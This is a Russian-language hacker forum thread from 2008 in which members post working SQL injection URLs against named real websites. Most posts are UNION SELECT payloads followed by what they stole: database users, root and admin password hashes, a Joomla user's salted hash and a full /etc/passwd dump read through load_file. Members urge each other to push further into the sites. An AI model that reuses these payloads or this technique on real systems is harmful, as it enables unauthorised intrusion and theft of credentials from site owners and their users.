24.12.2008, 01:13
|
|
Новичок
Регистрация: 13.12.2008
Сообщений: 7
С нами:
9163671
Репутация:
25
|
|
http://www.sigames.com/downloads.php?type=view&id=20999+union+select+aes_ decrypt(aes_encrypt(version(),0x71),0x71),2,aes_de crypt(aes_encrypt(user(),0x71),0x71),aes_decrypt(a es_encrypt(database(),0x71),0x71),5,6,7,8,9,10,11, 12,13,14,15,16,17/*
4.1.13-standard:si_admin@62.73.186.72:sigames_v2
http://www.sigames.com/downloads.php?type=view&id=20999+union+select+user ,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17+fr om+mysql.user+limit+0,1/*
Есть доступ к mysql.user
http://www.sigames.com/downloads.php?type=view&id=20999+union+select+load _file('/etc/passwd'),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+f rom+mysql.user/*
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13  roxy:/bin:/bin/sh
postgres:x:31:32 ostgres:/var/lib/postgres:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:65534::/var/run/sshd:/bin/false
stan:x:1000:100::/home/stan:/bin/bash
jason:x:1001:100::/home/jason:/bin/bash
Debian-exim:x:103:103::/var/spool/exim4:/bin/false
mysql:x:1002:104::/home/mysql:
bb:x:1003:105::/home/bb:
hobbit:x:1004:106:Hobbit user:/usr/lib/hobbit:
У юзера есть права на чтение файлов но из веб дир вывести ничего не получилось.
Может у кого чего иполучится.Удачи! |
|
|
24.12.2008, 01:46
|
|
Новичок
Регистрация: 20.12.2008
Сообщений: 24
С нами:
9152742
Репутация:
62
|
|
http://www.7samuraev.ru/crash/pic.php?id=-135+union+select+1,2,3,concat_ws(0x3a3a,user,passw ord),5,6,7+from+mysql.user/*
root::*B80F079A936E4FCA95C38E7313DC13A6352F34DB
Тиц:180
PR: 4
Version: 4.1.21
database: 7samuraev
user: root@localhost
Последний раз редактировалось -=Razor=-; 24.12.2008 в 12:56..
|
|
|
|
24.12.2008, 02:52
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами:
9454841
Репутация:
504
|
|
Сообщение от -=Razor=-
root::*B80F079A936E4FCA95C38E7313DC13A6352F34DB
Тиц:180
PR: 4
Version: 4.1.21
database: 7samuraev
user: root@localhost
Код:
http://www.7samuraev.ru/crash/pic.php?id=-135+union+select+1,2,3,concat_ws(char(32,45,32),name,pass,email),null,6,7+from+users+limit+7096,1/*
Последний раз редактировалось gisTy; 24.12.2008 в 02:56..
|
|
|
|
24.12.2008, 13:29
|
|
Banned
Регистрация: 17.12.2008
Сообщений: 9
С нами:
9157201
Репутация:
3
|
|
Код:
http://innovic.com.au/index.php?option=com_ilink&task=viewCateg&Itemid=153&categ_id=-1+union+select+concat(username,0x3a,password)+from+jos_users/*
Самописный (видимо) компонент для CMS Joomla 
md5($pass.$sault)
Lee:8599fc50c533955c5e68491fd4f43098:zybkP1wPpEEJy o68
Код:
http://www.labo-bayern.de/index.php?option=com_mylink&Itemid=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mos_users+limit+1,1/*
Аналогично записи выше, однозначна самописный компонент для CMS Mambo
md5
admin:19263790dd9a16266048f800b031c400
Последний раз редактировалось TAKO; 24.12.2008 в 13:43..
|
|
|
|
24.12.2008, 15:44
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
http://www.globalresearch.ca/index.php?context=va&aid=11426+union+select+1,2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,concat_ws(char(5 8),user(),version(),database()),35,36,37,38,39,40, 41,42,43,44,45,46,47,48,49,50,51,52+limit+1,1/*
Version 5.0.24
Интересный вывод =)
|
|
|
|
24.12.2008, 15:56
|
|
Познающий
Регистрация: 23.12.2008
Сообщений: 81
С нами:
9148120
Репутация:
97
|
|
Антибоян не досутпен, если вдруг будет повтор сообщите!
_http://vvlaw.com.ua/index.php?id=-28+union+select+version(),2,3--
5.0.51a-community vvlawnet_user@localhost
---------
_http://www.heimlichinstitute.org/page.php?id=-34+union+select+1,2,3,4--
---------
_http://www.canyonchasers.net/maps/results.php?id=-21+union+select+1,version(),3,4,user(),6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24--
3-cc_php@localhost | 5.0.67-community
admin:a468fb
Последний раз редактировалось I love this game; 24.12.2008 в 16:11..
|
|
|
|
24.12.2008, 21:11
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
С нами:
9764446
Репутация:
123
|
|
Сообщение от I love this game
_http://www.canyonchasers.net/maps/results.php?id=-21+union+select+1,version(),3,4,user(),6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24--
3-cc_php@localhost | 5.0.67-community
admin:a468fb
Можно еще так )
http://www.canyonchasers.net/maps/results.php?id=-1%20UNION%20ALL%20SELECT%20Null,concat(USER_LOGIN, %200x3a,%20USER_PASS),USER_EMAIL,Null,ID,Null,Null ,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null ,Null,Null,Null,Null,Null,Null,Null%20FROM%20wp_us ers--
|
|
|
|
25.12.2008, 00:59
|
|
Новичок
Регистрация: 01.12.2008
Сообщений: 26
С нами:
9180250
Репутация:
10
|
|
Кому интересно - переберите столбцы
http://www.sovtest.ru/publication.php?id=999999999+union+select+1,id,3,4 ,5,6,7,8+from+member
|
|
|
|
25.12.2008, 03:08
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
С нами:
9764446
Репутация:
123
|
|
http://icisa.info/news/news.php?id=-9+union+select+1,2,3,version(),5,6,7,8--
5.0.51a-community
+
PR5
http://www.downtowncrossing.org/shop/shop.php?id=-103+union+select+1,concat_ws(0x3a,username,passwor d),3,4+from+admin--
+
http://www.plaza-shopping.com/shop.php?id=-12+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18--
4.0.27-max-log
Последний раз редактировалось hackmen; 25.12.2008 в 03:45..
|
|
|
|
25.12.2008, 15:35
|
|
Новичок
Регистрация: 01.12.2008
Сообщений: 26
С нами:
9180250
Репутация:
10
|
|
Херстияне...правильные и славные 
http://www.hram-evenkya.ru/fnews2.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(user name,0x3a,user_password),13,14,15,16,17,18+from+hr amevenkyaru_forum.phpbb_users+limit+1,1 |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
